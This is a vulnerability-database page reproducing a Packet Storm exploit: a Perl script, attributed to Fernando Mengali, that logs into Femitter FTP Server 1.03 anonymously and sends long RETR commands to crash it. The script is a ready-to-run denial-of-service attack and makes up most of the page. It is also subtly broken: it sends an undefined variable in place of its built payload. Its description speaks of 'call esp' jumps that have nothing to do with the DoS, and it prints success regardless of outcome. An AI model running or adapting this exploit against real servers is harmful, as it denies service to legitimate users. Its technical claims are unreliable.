Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormFernando MengaliPACKETSTORM:176410
HistoryJan 08, 2024 - 12:00 a.m.

Femitter FTP Server 1.03 Denial Of Service

2024-01-0800:00:00
Fernando Mengali
packetstormsecurity.com
79
femitter ftp server
denial of service
fernando mengali
windows xp
net::ftp
memory corruption
exploitation
deprecated

7.4 High

AI Score

Confidence

Low

JSON
`#!/usr/bin/perl  
  
use Net::FTP;  
  
# Exploit Title: Femitter FTP Server 1.03 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 08 january 2024  
# Vendor Homepage: https://acritum.com/  
# Download to demo: https://drive.google.com/file/d/1GBFmc7tMavA9mMoZPYVlUVUe62dGjBhF/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Femitter FTP Server 1.03  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# VΓ­deo: https://drive.google.com/file/d/1n_WzyNiOwHRen60en5rh56Q4AyDfVbF_/view?usp=sharing  
  
#1. Description  
  
#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server does not correctly handle the amount of data or bytes of the command RETR, resulting in memory corruption.  
#When authenticating to the FTP server with a long RETR or a RETR with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.  
  
#2. Proof of Concept - PoC  
  
$sis="$^O";  
  
if ($sis eq "windows"){  
$cmd="cls";  
} else {  
$cmd="clear";  
}  
  
system("$cmd");  
  
intro();  
main();  
  
print "[+] Exploiting... \n";  
  
my $payload = "\x41\x2C\x41\x20\x42"x500;  
  
my $ftp = Net::FTP->new($ip, Debug => 0) or die "Could not connect: $@";  
  
my $sc= "A"x800;  
  
$ftp->login("anon","anon") or die "Failed: " . $ftp->message;  
  
$ftp->quot("RETR ".$c."\r\n") or die "Error: " . $ftp->message;  
$ftp->quot("RETR ".$c."\r\n") or die "Error: " . $ftp->message;  
  
$ftp->quit;  
  
print "[+] Done - Exploited success!!!!!\n\n";  
  
sub intro {  
print "######################################################################\n";  
print "# Femitter FTP Server 1.03 - Denial of Service #\n";  
print "# #\n";  
print "# Coded by Fernando Mengali #\n";  
print "# #\n";  
print "# e-mail: fernando.mengalli\@gmail.com #\n";  
print "# #\n";  
print "######################################################################\n";  
}  
  
sub main {  
  
our ($ip, $port) = @ARGV;  
  
unless (defined($ip) && defined($port)) {  
  
print " \nUsage: $0 <ip> <port> \n";  
exit(-1);  
  
}  
}  
  
#3. Solution/ How to fix:  
  
# This version product is deprecated  
`

7.4 High

AI Score

Confidence

Low

JSON